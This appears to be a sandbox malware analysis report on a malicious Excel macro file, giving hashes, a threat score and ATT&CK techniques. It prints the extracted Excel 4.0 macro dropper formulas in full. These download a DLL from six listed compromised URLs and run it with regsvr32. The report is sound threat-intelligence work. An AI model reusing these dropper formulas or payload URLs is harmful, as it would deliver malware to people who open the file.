Overview

overview

10

Static

static

10

CS-4458158...1.xlsm

windows7-x64

10

CS-4458158...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    CS-44581581370681.xlsm

  • Size

    46KB

  • Sample

    230630-pxdnjsda71

  • MD5

    0ee2370b496603534108c638a378be84

  • SHA1

    ce0a60592f79394d8abe0c51d12e606760024fdc

  • SHA256

    a657d3b4f65b1da6a9b498efd74772a6b8c393555587694e5da423b8e108ae2e

  • SHA512

    531a5422d7b16dec58858d6136e71d8465585f335099b8719bc253500ac5837e5e14371e90f80b9d013ae1633fa6c7a09b0a91132081f04e24fc477d8ad6a0ae

  • SSDEEP

    768:AmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:RBlntTEvDLmXi3JvG6YzATOJnXYSXRM

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://eles-tech.com/css/KzMysMqFMs/

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

https://txpcrescue.com/cgi-bin/5tSO8/

http://hadramout21.com/jetpack-temp/Py/

http://haribuilders.com/zoombox-master/4HYGX/

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://eles-tech.com/css/KzMysMqFMs/
xlm40.dropper

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
xlm40.dropper

https://txpcrescue.com/cgi-bin/5tSO8/
xlm40.dropper

http://hadramout21.com/jetpack-temp/Py/
xlm40.dropper

http://haribuilders.com/zoombox-master/4HYGX/
xlm40.dropper

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/

Targets

    • Target

      CS-44581581370681.xlsm

    • Size

      46KB

    • MD5

      0ee2370b496603534108c638a378be84

    • SHA1

      ce0a60592f79394d8abe0c51d12e606760024fdc

    • SHA256

      a657d3b4f65b1da6a9b498efd74772a6b8c393555587694e5da423b8e108ae2e

    • SHA512

      531a5422d7b16dec58858d6136e71d8465585f335099b8719bc253500ac5837e5e14371e90f80b9d013ae1633fa6c7a09b0a91132081f04e24fc477d8ad6a0ae

    • SSDEEP

      768:AmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:RBlntTEvDLmXi3JvG6YzATOJnXYSXRM

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks